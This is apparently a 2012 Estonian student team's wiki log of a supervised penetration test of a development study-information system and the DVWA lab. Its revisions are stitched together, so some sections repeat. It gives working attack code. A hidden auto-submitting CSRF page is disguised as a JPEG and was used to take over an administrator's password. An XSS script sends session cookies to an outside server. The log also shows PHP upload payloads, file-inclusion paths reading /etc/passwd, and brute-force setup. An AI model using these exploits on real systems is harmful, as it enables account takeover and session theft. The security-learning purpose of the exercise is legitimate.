Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Tegijad ==
Alo Konno<br>
Urmo Lihten<br>
Taavi Podžuks<br>
Matis Alliksoo<br>
Sander Saarm

Security team

2012-03-30T09:27:13Z

Ulihten: /* 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine */

Security team

2012-03-30T09:25:04Z

Ulihten: /* 1. päev - Materjalidga tutvumine */

== 1. päev - Materjalidga tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
